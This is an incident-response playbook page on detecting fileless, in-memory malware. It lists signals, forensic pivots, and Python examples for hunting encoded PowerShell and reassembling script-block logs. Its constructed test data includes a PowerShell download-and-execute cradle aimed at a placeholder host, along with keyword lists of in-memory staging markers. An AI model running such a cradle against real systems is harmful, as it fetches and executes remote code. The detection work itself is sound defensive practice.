Fileless Malware With Minimal On-Disk Footprint

The suspected malware runs primarily in memory with minimal or no on-disk persistence. Traditional file-hash IoC hunts return empty, and disk-image analysis misses the active payload. Response must pivot to memory forensics, ETW, PowerShell script-block logging, and AMSI telemetry.

Signals

  • EDR process-creation events show anomalous child processes of legitimate binaries (w3wp.exe, svchost.exe, LSASS) with no corresponding disk write
  • PowerShell execution with -EncodedCommand flags and no script file on disk
  • Network C2 telemetry exists without any matching file-system-resident malicious binary
  • AMSI or Windows Defender flagged in-memory scripts without disk persistence

Pivot Actions

  1. Capture volatile memory from suspected hosts before any reboot; use Volatility/MemProcFS to extract injected code, hollowed processes, and reflectively-loaded modules
  2. Enable or dump existing PowerShell script-block logging (Event ID 4104) and PowerShell transcription to recover executed scripts even without disk files
  3. Review ETW providers (Microsoft-Windows-PowerShell, Microsoft-Antimalware-Scan-Interface) for real-time execution telemetry
  4. Hunt via process-creation anomalies: rare parent-child chains, process arguments with long base64 payloads, processes with no backing file on disk
  5. Query AMSI telemetry and Defender detection logs for in-memory malicious content scanned by script engines
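The process-creation hunt in step 4 can be scripted against Sysmon Event ID 1 style records. The block below is an added example written for this page, not code from any EDR vendor or tool named here; the sample events are constructed, and the parent/child lists and keyword hints are illustrative starting points rather than a vetted ruleset. It flags script hosts launched by unusual parents, decodes `-EncodedCommand` payloads (base64 of UTF-16LE) so the analyst sees the script text instead of a blob, and separately notes long base64 runs in arguments that carry no encoded-command flag.

```python
import base64
import re
from typing import Dict, List, Optional

# Script hosts that commonly run fileless payloads once spawned by an unusual parent.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Parents that rarely have a legitimate reason to launch a script host (illustrative list).
ODD_PARENTS = {"w3wp.exe", "sqlservr.exe", "winword.exe", "excel.exe", "outlook.exe", "lsass.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# followed by base64 of a UTF-16LE string.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})")
# Any long run of base64 alphabet anywhere in the arguments.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")
# Substrings that, in a decoded script, usually indicate in-memory staging (illustrative).
CRADLE_HINTS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                "reflection.assembly", "virtualalloc")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(event: Dict[str, str]) -> List[str]:
    """Return the anomaly findings for one process-creation record."""
    findings: List[str] = []
    image, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")

    if image in SCRIPT_HOSTS and parent in ODD_PARENTS:
        findings.append(f"rare parent-child chain: {parent} -> {image}")

    match = ENCODED_FLAG.search(cmd)
    if match:
        script = decode_encoded_command(match.group(1))
        if script is None:
            findings.append("encoded command that does not decode as UTF-16LE base64")
        else:
            hits = [k for k in CRADLE_HINTS if k in script.lower()]
            note = f" (hints: {', '.join(hits)})" if hits else ""
            findings.append(f"encoded command decodes to: {script[:80]!r}{note}")
    elif LONG_B64.search(cmd):
        findings.append("long base64 blob in process arguments")
    return findings


# Constructed sample records modelled on Sysmon Event ID 1 fields; not real telemetry.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + SAMPLE_B64},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -nop -c "[Convert]::FromBase64String(\'' + "A" * 120 + '\')"'},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        for finding in hunt(ev):
            print(f"event {i}: {finding}")
```

Run over a real export, the decoded script text is what you carry into the 4104 and AMSI pivots; the parent-child allowlist should be tuned to the environment before it is used at scale.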

Alternate Evidence Sources

  • RAM captures parsed with Volatility/MemProcFS (malfind, ldrmodules, dlllist, hollowfind plugins)
  • PowerShell Event ID 4104 script-block logging records the actual executed script contents
  • Sysmon Event ID 1 (process creation) with command-line logging enabled
  • ETW real-time telemetry for PowerShell, .NET runtime, and AMSI events
  • EDR memory-scan telemetry (CrowdStrike MemScan, SentinelOne RSO) that scans in-memory content
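Event ID 4104 records carry the executed script text, but PowerShell splits large script blocks across several events that share a ScriptBlockId and are numbered with MessageNumber/MessageTotal, and they are not guaranteed to arrive in order. The block below is an added example for this page, not part of any tool it names; the sample events are constructed. It reassembles fragments per ScriptBlockId, marks blocks whose Path field is empty (no backing script file) as fileless, and reports blocks that cannot be completed because fragments are missing from the export.

```python
from collections import defaultdict
from typing import Dict, Iterable, List

# Constructed 4104-style records. Real events expose ScriptBlockId, MessageNumber,
# MessageTotal, ScriptBlockText and Path (empty when the block was not run from a file).
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "[Reflection.Assembly]::Load($data) | Out-Null"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1, "Path": r"C:\scripts\backup.ps1",
     "ScriptBlockText": "Get-ChildItem C:\\data | Compress-Archive -DestinationPath D:\\bk.zip"},
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "$data = [Convert]::FromBase64String($blob); "},
    # Fragment 2 of 3 is absent: simulates a truncated or partially forwarded log.
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 3, "Path": "",
     "ScriptBlockText": "function Stage { "},
    {"ScriptBlockId": "b3", "MessageNumber": 3, "MessageTotal": 3, "Path": "",
     "ScriptBlockText": " }"},
]


def reassemble_script_blocks(events: Iterable[dict]) -> Dict[str, dict]:
    """Group 4104 fragments by ScriptBlockId and join them in MessageNumber order."""
    parts: Dict[str, Dict[int, str]] = defaultdict(dict)
    meta: Dict[str, tuple] = {}
    for ev in events:
        sbid = ev["ScriptBlockId"]
        parts[sbid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        meta[sbid] = (int(ev["MessageTotal"]), ev.get("Path", "") or "")

    blocks: Dict[str, dict] = {}
    for sbid, chunks in parts.items():
        total, path = meta[sbid]
        expected = set(range(1, total + 1))
        missing = sorted(expected - set(chunks))
        blocks[sbid] = {
            "text": "".join(chunks[n] for n in sorted(chunks)),
            "complete": not missing,
            "missing_fragments": missing,
            "fileless": path == "",
            "path": path,
        }
    return blocks


def fileless_block_ids(blocks: Dict[str, dict]) -> List[str]:
    """ScriptBlockIds that ran without a backing .ps1 on disk."""
    return sorted(sbid for sbid, b in blocks.items() if b["fileless"])


if __name__ == "__main__":
    result = reassemble_script_blocks(SAMPLE_4104)
    for sbid in fileless_block_ids(result):
        b = result[sbid]
        state = "complete" if b["complete"] else f"missing fragments {b['missing_fragments']}"
        print(f"{sbid} ({state}): {b['text']}")
```

Incomplete blocks still deserve a look: a fragment gap often means the forwarder or the event-log size limit dropped part of the script, and the memory capture from step 1 is where the rest of it may still be found.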